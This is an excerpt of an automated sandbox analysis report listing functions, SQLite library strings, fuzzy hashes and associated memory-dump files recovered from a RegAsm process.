                                                                                                                                                                                                • Opcode Fuzzy Hash: 2828baff745f48db3ec292c075e835b153039b9630abc7c9cafd21bf68bcceec
                                                                                                                                                                                                • Instruction Fuzzy Hash: B371D576A082518BEF04DF14E8C17EA7BE1EF44324F950999FC85CB292E735E889C761
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B4A7D30 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 199COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: winShmMap1$winShmMap2$winShmMap3
                                                                                                                                                                                                • API String ID: 0-3826999013
                                                                                                                                                                                                • Opcode ID: fb21d9b83ed107f5166a5a41e177276402d34ee1ca17ead0efcdf483f45bbc53
                                                                                                                                                                                                • Instruction ID: 8da185322f4fb6562e85f72c18cf52d5e3ce6badc4343b445695ad83288d473d
                                                                                                                                                                                                • Opcode Fuzzy Hash: fb21d9b83ed107f5166a5a41e177276402d34ee1ca17ead0efcdf483f45bbc53
                                                                                                                                                                                                • Instruction Fuzzy Hash: 2961ABB16007419FDB24CF34CC81AA7B7E9AFA8744F01896DF98797251EB34E909CB52
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B640FC2 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 189COMMONLIBRARYCODE
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 1B640FE7
                                                                                                                                                                                                • CatchIt.LIBVCRUNTIME ref: 1B6410CD
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CatchEncodePointer
                                                                                                                                                                                                • String ID: MOC$RCC
                                                                                                                                                                                                • API String ID: 1435073870-2084237596
                                                                                                                                                                                                • Opcode ID: 79b1bb187d3271987d47799367df50a4880768553b224889993c2d336ed04611
                                                                                                                                                                                                • Instruction ID: 0e6d50f213cd16d45b1fd53c8722e6f948691e91b8ac9c3f670cdb4ed35b72d3
                                                                                                                                                                                                • Opcode Fuzzy Hash: 79b1bb187d3271987d47799367df50a4880768553b224889993c2d336ed04611
                                                                                                                                                                                                • Instruction Fuzzy Hash: 8F4179B5A00649EFCF15CF95CD82AEE7FB5FF58300F248059E91467210D735AA50DB50
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B4A4CE0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 160COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: temp$wrong number of vtable arguments
                                                                                                                                                                                                • API String ID: 0-2849069181
                                                                                                                                                                                                • Opcode ID: ea97c32162853ce65ad632d69162a33b59c76c65121e586272c88bbec71c6dc9
                                                                                                                                                                                                • Instruction ID: 9c7ab2336b3d5f2ed02949674fce3f5870e638fc957363eea19668f3844b1567
                                                                                                                                                                                                • Opcode Fuzzy Hash: ea97c32162853ce65ad632d69162a33b59c76c65121e586272c88bbec71c6dc9
                                                                                                                                                                                                • Instruction Fuzzy Hash: 4C51AFB9A043458FDB15CF24D4905DABBF1BF89304F444A6DE4865B321D332E94ACB92
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B4D35E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • misuse, xrefs: 1B4D35F4
                                                                                                                                                                                                • %s at line %d of [%.10s], xrefs: 1B4D35F9
                                                                                                                                                                                                • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B4D35EA
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                                                                                                                                                                                • API String ID: 0-3564305576
                                                                                                                                                                                                • Opcode ID: 8c7df07536abd1870e1c365c22b35c16b61c63fc8795b175223560d99dd2e24f
                                                                                                                                                                                                • Instruction ID: a923a06f595b3deeb8a56d3f4b8c13f0321ca1f8cc068aea8c949c0712e927f8
                                                                                                                                                                                                • Opcode Fuzzy Hash: 8c7df07536abd1870e1c365c22b35c16b61c63fc8795b175223560d99dd2e24f
                                                                                                                                                                                                • Instruction Fuzzy Hash: 5051E1F5E00711AFDB148F18C8D4A96BBB4BF64724F09C25CE8995B342D331E850CB91
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B5496B0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 136COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • database corruption, xrefs: 1B5497EA
                                                                                                                                                                                                • %s at line %d of [%.10s], xrefs: 1B5497EF
                                                                                                                                                                                                • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B5497E0
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                                                                                                                                                                                • API String ID: 0-2528248365
                                                                                                                                                                                                • Opcode ID: 24554fc780079735f151fbe592e322dc13a9cdd5f6bb96b0bf8866ed0d5f6158
                                                                                                                                                                                                • Instruction ID: 7651bb36ed55757b85742083248b67717184af183d9e3c4f24c32e0069592332
                                                                                                                                                                                                • Opcode Fuzzy Hash: 24554fc780079735f151fbe592e322dc13a9cdd5f6bb96b0bf8866ed0d5f6158
                                                                                                                                                                                                • Instruction Fuzzy Hash: DE4159766047908FE7218F7C94416D7FFF0DF82221F6849AED2C58B652F262E482D361
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B4A0300 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 128COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: delayed %dms for lock/sharing conflict at line %d$winWrite1$winWrite2
                                                                                                                                                                                                • API String ID: 0-1808655853
                                                                                                                                                                                                • Opcode ID: 3ab857dddf7e1c84410c436fee5acd841a7e7e52eea2f31a0dae476875dcbcc5
                                                                                                                                                                                                • Instruction ID: 16cbe8b3a561be6ca43fda044150beb38451cc43bb76de717272b865ccab8128
                                                                                                                                                                                                • Opcode Fuzzy Hash: 3ab857dddf7e1c84410c436fee5acd841a7e7e52eea2f31a0dae476875dcbcc5
                                                                                                                                                                                                • Instruction Fuzzy Hash: E1412871A003119BD704AE38DC809AFB798BBE8210F554A2EF992C6350D331D549CBA5
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B615960 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 126COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • misuse, xrefs: 1B615980
                                                                                                                                                                                                • %s at line %d of [%.10s], xrefs: 1B615985
                                                                                                                                                                                                • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B615976
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                                                                                                                                                                                • API String ID: 0-3564305576
                                                                                                                                                                                                • Opcode ID: 2023d91c2405a7825b7e3ea73f1d9584d81e560518bb5dfa49c5ded48be5dc43
                                                                                                                                                                                                • Instruction ID: 110e8926c3833da639e956e99dbb5efcfd3e0e9afcae1e7d28e3655002c23d83
                                                                                                                                                                                                • Opcode Fuzzy Hash: 2023d91c2405a7825b7e3ea73f1d9584d81e560518bb5dfa49c5ded48be5dc43
                                                                                                                                                                                                • Instruction Fuzzy Hash: D54129B6D413519FD7108B54DC81BDAF7F4AFE5320F88056AFC845B241E329E994C7A2
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B628850 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 118COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • delayed %dms for lock/sharing conflict at line %d, xrefs: 1B62895F
                                                                                                                                                                                                • os_win.c:%d: (%lu) %s(%s) - %s, xrefs: 1B6288E2
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: delayed %dms for lock/sharing conflict at line %d$os_win.c:%d: (%lu) %s(%s) - %s
                                                                                                                                                                                                • API String ID: 0-1037342196
                                                                                                                                                                                                • Opcode ID: 1d4bb1264e13cf800ce7ec4bb1a1c9d0ed3e8c9bb56719ff954f62fe24282b0c
                                                                                                                                                                                                • Instruction ID: dce0b093af0f0b01450db634de51ce5db887c25bb7d12be59efc73f85055072b
                                                                                                                                                                                                • Opcode Fuzzy Hash: 1d4bb1264e13cf800ce7ec4bb1a1c9d0ed3e8c9bb56719ff954f62fe24282b0c
                                                                                                                                                                                                • Instruction Fuzzy Hash: EB213BB4604256AFEB209724CC86BFBBBD9AFE4304F944C5DE5C8C6192C23498448753
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B4D5390 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 117COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • database corruption, xrefs: 1B4D5408
                                                                                                                                                                                                • %s at line %d of [%.10s], xrefs: 1B4D540D
                                                                                                                                                                                                • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B4D53FE
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                                                                                                                                                                                • API String ID: 0-2528248365
                                                                                                                                                                                                • Opcode ID: d6982fd4200109579bcf906d8ee94d8050fe0fa2bccb839d7e97c6e67fed9c75
                                                                                                                                                                                                • Instruction ID: 81f58cded71fcfcc31c9d2deca3dafeb8a0f58bc21f605ccd26038b46dcd7a7a
                                                                                                                                                                                                • Opcode Fuzzy Hash: d6982fd4200109579bcf906d8ee94d8050fe0fa2bccb839d7e97c6e67fed9c75
                                                                                                                                                                                                • Instruction Fuzzy Hash: 7131AD656007A146D7218F38D8617E7BBE09F61313F08846EE9C5C7781E726F492C3E2
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B5B7ED0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 111COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • error in tokenizer constructor, xrefs: 1B5B7F92
                                                                                                                                                                                                • no such tokenizer: %s, xrefs: 1B5B7F1B
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: error in tokenizer constructor$no such tokenizer: %s
                                                                                                                                                                                                • API String ID: 0-815501780
                                                                                                                                                                                                • Opcode ID: 209d9a780f6860f0d3496afa61d2425dae8c97c43a789f6d9df45af7f0793b10
                                                                                                                                                                                                • Instruction ID: 452940ca3ce8b84d5236a912a21028e24e7325c0c4ea99e68429710c0f559b7a
                                                                                                                                                                                                • Opcode Fuzzy Hash: 209d9a780f6860f0d3496afa61d2425dae8c97c43a789f6d9df45af7f0793b10
                                                                                                                                                                                                • Instruction Fuzzy Hash: 6F31CF767002558FDB20CF19D880BAAB7E5EF84765F18066DE988DB300E332E805CB61
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B49F000 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 97COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • second argument to nth_value must be a positive integer, xrefs: 1B49F0C4
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
